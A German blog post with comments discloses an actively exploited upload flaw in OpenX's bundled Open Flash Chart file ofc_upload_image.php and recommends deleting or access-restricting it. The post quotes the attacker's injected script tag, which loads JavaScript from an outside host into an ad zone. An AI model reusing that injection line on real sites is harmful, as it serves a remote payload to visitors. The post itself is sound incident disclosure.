In OpenX 2.8.6 (und 2.8.5 und wahrscheinlich auch früheren Versionen) befindet sich eine Sicherheitslücke, über die ein Angreifer Zugriff auf den Server erlangen kann. Die Lücke wird bereits aktiv ausgenutzt (wie ich auf die harte Art erfahren musste). Es sieht so aus, als sei die Lücke im Kontext von OpenX derzeit nur Übeltätern bekannt, denn ich konnte nirgends sonst einen Hinweis darauf finden.
Betroffen ist folgende Datei:
/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php
Diese Datei wird zusammen mit dem OpenX-Video-Plugin ausgeliefert. Es handelt sich dabei um eine Komponente von Open Flash Chart 2, die schon bekannt ist. Im Wesentlichen erlaubt es die Lücke, beliebigen Code auf den Server zu laden. Der Angreifer lädt so eine Backdoor in Form einer PHP-Datei auf den Server und hat dadurch die vollen Rechte des Webserver-Accounts und kann dadurch (unter anderem) die Kontrolle über die OpenX-Installation übernehmen.
In unserem Fall legte der Angreifer einen neuen OpenX-Admin namens „root“ an. Interessanterweise tauchte dieser Benutzer nirgends in den Accounts im OpenX-Backend auf. Er erschien aber im User Log, als er folgendes bösartige Script an eine unserer Werbezonen anhängte:
<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>
Überraschenderweise ist diese Lücke auch in der aktuellen Version von Open Flash Chart noch enthalten. Sie ist eigentlich nicht sonderlich schwer zu beheben, aber die Mühe scheint sich noch niemand gemacht zu haben. Ich auch nicht, da ich diese Komponente derzeit nicht benötige. Ein einfacher Workaround ist, die Datei zu löschen. Die Kernfunktionalität von OpenX sollte dadurch nicht beeinträchtigt werden. Alternativ kann man auch den Zugang zu der Datei per htaccess auf vertrauenswürdige Benutzer beschränken.
Ich empfehle jedem Nutzer von OpenX, das sofort zu tun. Die Lücke wird wie gesagt bereits aktiv ausgenutzt!
Herzlichen Dank für Deine Information. Finde es wirklich toll wie ausführlich Du das problem beschrieben hast und was extrem wichtig ist, wie man es lösen sollte. Nicht jeder versteht genau was so alles im PHP Code drinsteht (meinereiner). Danke
Thanks for letting people know about the potential vulnerability, which we have already resolved. We encourage everyone running the downloadable version of OpenX to upgrade to the latest version. For more info, please visit http://blog.openx.org/09/security-update/
Ich hab bei mir dieselbe Datei noch an einer anderen Stelle gefunden:
www/admin/plugins/apStatsGraphsUI/lib/ofc_upload_image.php
Kann das jemand bestätigen, daß die da auch gelöscht werden soll/kann?
Jens, das ist ein Plugin, das nicht zum Lieferumfang von OpenX gehört. Ich würde die Datei sicherheitshalber dort auch löschen.
Wenn ich das richtig mitbekommen habe, gab es aber von dem Plugin-Anbieter kürzlich (noch bevor OpenX reagiert hat) ein Update. Kann gut sein, dass das Problem in der neuesten Version behoben ist.
Danke Flo.
Ich hab die Datei aus dem apStatsGraphsUI auch rausgeworfen, nachdem ein Vergleich mit Textpad exakt denselben Code geliefert hat wie beim VideoPlugin.
In der Tat gibt es aber auch ein Update des apStatsGraphsUI Plugins, da fehlt die Datei schlichtweg drin.
Danke für die Infos
Ich hab die Datei aus dem apStatsGraphsUI auch rausgeworfen, nachdem ein Vergleich mit Textpad exakt denselben Code geliefert hat wie beim VideoPlugin
Danke für die Infos. Ich hatte noch keine Probleme, aber Vorsorge ist immer besser!